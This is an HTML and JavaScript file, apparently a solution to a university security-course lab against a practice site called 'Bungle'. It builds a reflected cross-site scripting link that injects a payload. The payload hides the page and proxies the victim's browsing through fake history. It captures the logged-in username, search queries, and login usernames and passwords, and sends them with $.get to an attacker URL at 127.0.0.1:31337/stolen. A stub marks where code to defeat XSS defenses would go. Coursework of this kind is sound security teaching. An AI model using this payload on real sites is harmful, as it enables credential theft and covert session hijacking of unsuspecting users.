Untitled

<html>
<meta charset="utf-8">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
    // Extend this function:
    function payload(attacker, prox_url) {
        function log(data) {
            console.log($.param(data))
            $.get(attacker, data);
        }
        function proxy(href) {
            var stateObj = { foo: "bar" };
            history.pushState(stateObj, "Search", href);
            fake_hist.push(href);
            $("html").load(href, function(){
                $("html").show();
                var username = $("#logged-in-user").text();
                log({event: "nav", user: username, uri: href});
                $("#query").val("PWND!");

                //handle back button
                window.onpopstate = function(evt) {
                    evt.preventDefault();
                    fake_hist.pop()
                    proxy(fake_hist.pop());
                };

                //Handle Search from home page
                $(".search-well > form").submit(function(evt) {
                    evt.preventDefault();
                    var query = encodeURIComponent($("#query").val());
                    log({event: "search", query: query});
                    proxy("/search?q=" + query);
                })

                //handle log in from home page
                $(".well > form").submit(function(evt) {
                    evt.preventDefault();
                    var tmp_username = $("#username").val();
                    var tmp_password = $("#userpass").val();
                    log({event: "login", user: tmp_username, pass: tmp_password});
                    $.post("/login", "username="+tmp_username+"&password="+tmp_password, "text");
                    setTimeout(function() {proxy(".");}, 300);
                });

                //handle logout from anywhere
                $(".navbar-form").submit(function(evt) {
                    evt.preventDefault();
                    log({event: "logout", user: username});
                    $.post("/logout", "true");
                    setTimeout(function() {proxy(".");}, 300);
                })

                //handle home page link from anywhere
                $("#bungle-lnk").click(function(evt) {
                    evt.preventDefault();
                    proxy(".");
                })

                //handle search again button from search page
                $("#search-again-btn").removeAttr("href");
                $("#search-again-btn").click(function() {
                    proxy(".");
                });

            });
        }
        $("html").hide();
        var fake_hist = new Array();
        proxy(prox_url);
    }

function makeLink(xssdefense, target, attacker, prox_url) {
        if (xssdefense == 0) {
            return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
                encodeURIComponent("<script" + ">" + payload.toString() +
                                ";payload(\"" + attacker + "\", \"" + prox_url + "\");</script" + ">");
        } else {
            // Implement code to defeat XSS defenses here.
        }
    }

    var xssdefense = 0;
    var target = "http://bungle.cs461.cs.illinois.edu/";
    var attacker = "http://127.0.0.1:31337/stolen";
    $(function() {
        var url = makeLink(xssdefense, target, attacker, ".");
        $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
    });
</script>
<h3></h3>
</html>